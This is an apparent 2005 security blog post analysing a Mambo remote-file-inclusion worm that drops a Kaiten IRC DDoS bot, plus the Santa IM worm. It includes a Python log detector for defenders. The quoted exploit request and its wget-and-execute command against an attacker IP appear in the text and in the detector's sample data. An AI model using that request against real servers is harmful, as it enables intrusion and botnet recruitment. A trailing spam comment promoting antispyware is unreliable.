
Two Minor Worms of Note: Kaiten, Santa

It's Thursday, and that must mean more worms on the loose. Here are two relatively minor worms worth noting, if only to gauge the state of the art in attacks these days.

First up is a newer variant of the Linux Mambo worm, now in the wild. The hole it exploits is a remote file inclusion in Mambo's index2.php: the request supplies its own mosConfig_absolute_path pointing at the attacker's server, so Mambo includes cmd.gif from there, and that file evidently acts as a PHP shell that runs whatever is passed in the cmd parameter. Here the command fetches and launches the worm's kickoff script. If you've been attacked, you will see log lines like this:

index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?
&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;

Decoded, the cmd value is simply: cd /tmp; wget 209.136.48.69/micu; chmod 744 micu; ./micu

The download site (209.136.48.69) appears to have been taken down, though it was still up earlier this morning (which delayed my posting this). The worm installs two components. The first, mare, is the Mambo attack vector, i.e. the spreader. The second is a variant of the Kaiten IRC bot. This variant connects to the IRC servers us.undernet.org and eu.undernet.org and can launch the standard suite of DDoS attacks. The callgraph of this component, named "ro" in this instance, is graphed here.

So, what's the state of the hack? Pretty lousy, to be honest, even worse than the Linux Slapper worm from 2002. Instead of shipping one self-contained binary, the worm fetches a Bash script (micu in the log line above) which in turn fetches the two binaries and launches them, all from a single central site. That gives defenders one place to cut the worm off, as the takedown of 209.136.48.69 shows. It would have been easier, and more robust, to fetch the malware from the attacking node rather than a central site and to bundle it all in one executable.
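If you want to hunt for this in your own web server logs rather than eyeball them, the following detector is an added example (mine, not code from the post or from the worm) that parses Apache access-log lines and flags the request shape quoted above: a GLOBALS parameter, a mosConfig_absolute_path value that points at a remote URL, and a cmd value that downloads and runs a file. It also pulls out the include URL and the dropper location as indicators. The log lines in SAMPLE_LOG are constructed; apart from the post's 209.136.48.69, every address, timestamp and user agent in them is made up.

```python
"""Flag Mambo remote-file-inclusion / command-injection attempts in Apache access logs.

Added example, not from the original post. The detected request shape follows the
log line quoted in the post; SAMPLE_LOG is constructed test data.
"""
import re
from urllib.parse import unquote

# Apache "combined" log prefix: client ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# mosConfig_absolute_path either bare or wrapped, e.g. GLOBALS[mosConfig_absolute_path]
RFI_PARAM_RE = re.compile(r'(?:^|\[)mosConfig_absolute_path\]?$')
# A cmd value that fetches something and then makes it executable or runs it
DOWNLOAD_RUN_RE = re.compile(r'\b(?:wget|curl|fetch|lynx)\b.*(?:\bchmod\b|\bperl\b|\bsh\b|\./)')
# Target of the first wget/curl, stopping at shell separators
FETCH_TARGET_RE = re.compile(r'\b(?:wget|curl)\s+(?:-\S+\s+)*([^\s;&|]+)')
REMOTE_SCHEMES = ('http://', 'https://', 'ftp://')


def parse_query(query):
    """Split on '&' only (never ';', which is part of the injected shell command)
    and percent-decode twice so single- and double-encoded payloads compare equal."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params[unquote(unquote(name))] = unquote(unquote(value))
    return params


def parse_line(line):
    """Return a dict of the request fields, or None for lines that are not access-log entries."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec['target'].partition('?')
    rec['path'] = path
    rec['params'] = parse_query(query)
    return rec


def classify(rec):
    """Return an alert dict for a parsed request, or None if nothing matched."""
    params = rec['params']
    findings, iocs = [], {}
    if 'GLOBALS' in params:
        findings.append('GLOBALS parameter present (register_globals overwrite)')
    for name, value in params.items():
        if RFI_PARAM_RE.search(name) and value.lower().startswith(REMOTE_SCHEMES):
            findings.append(f'remote include via {name}')
            # exploit URLs end in '?' so the path Mambo appends becomes a harmless query string
            iocs['include_url'] = value.rstrip('?')
    cmd = params.get('cmd')
    if cmd is not None and DOWNLOAD_RUN_RE.search(cmd):
        findings.append('download-and-execute sequence in cmd')
        m = FETCH_TARGET_RE.search(cmd)
        if m:
            iocs['dropper'] = m.group(1)
    if not findings:
        return None
    return {'client': rec['client'], 'ts': rec['ts'], 'path': rec['path'],
            'status': rec['status'], 'findings': findings, 'iocs': iocs}


def scan(lines):
    """Run every line through the parser and classifier; return the list of alerts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        alert = classify(rec)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample log: the post's exploit request, a benign Mambo page view,
# an RFI variant that only runs `id`, and a line that is not a log entry at all.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Dec/2005:09:14:02 -0500] "GET /index2.php?_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?'
    '&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu; HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [22/Dec/2005:09:15:10 -0500] "GET /index2.php?option=com_content&task=view&id=12&Itemid=1 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [22/Dec/2005:09:16:33 -0500] "GET /index2.php?GLOBALS[mosConfig_absolute_path]=http://198.51.100.7/c.txt?&cmd=id HTTP/1.1" 200 211 "-" "Wget/1.9"',
    'garbage line that is not an access log entry',
]

if __name__ == '__main__':
    for alert in scan(SAMPLE_LOG):
        print(alert['client'], alert['path'], '; '.join(alert['findings']), alert['iocs'])
```

Feed it `sys.stdin` or an open log file instead of SAMPLE_LOG to run it over real data. The query parser deliberately splits only on `&`: splitting on `;` as well (which older URL parsers do by default) would shred the injected shell command and hide the wget target.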

The second thing making the rounds today is a new IM worm. I've spent part of the day building a chart of IM worm activity for 2005, which I plan to post tomorrow. Right now, though, the Santa worm is the new kid on the block. Unlike past IM worms, which have stuck to one or two networks, this one targets users of all four major IM networks: AOL, MSN Messenger, Yahoo!, and ICQ. I didn't find another IM worm in the past year that used all four, so that is probably the most interesting thing about it. Otherwise it spams potential victims with links, installs a rootkit, and can steal information from the infected machine.

Nothing too major, but some things worth noting. Seems like everyone wants their own worm this year.

December 22, 2005 in IM worms, new worms | Permalink

Comments

Solution from Search-and-destroy.
If you own a computer, you must have antispyware to keep it running at its best. The problem is choosing a scan that works. I have tried many different types of scans in the past and then I ran across Search-and-destroy Antispyware. I have to say that the antispyware solution from Search-and-destroy is the best that I have used to date. It gets the job done and keeps my computer working like new. If you are interested in seeing for yourself just how good this antispyware works you can click on http://www.Search-and-destroy.com to learn more. I’m sure it would be worth your time to check it out.

Posted by: Chezy | May 1, 2009 1:24:17 PM
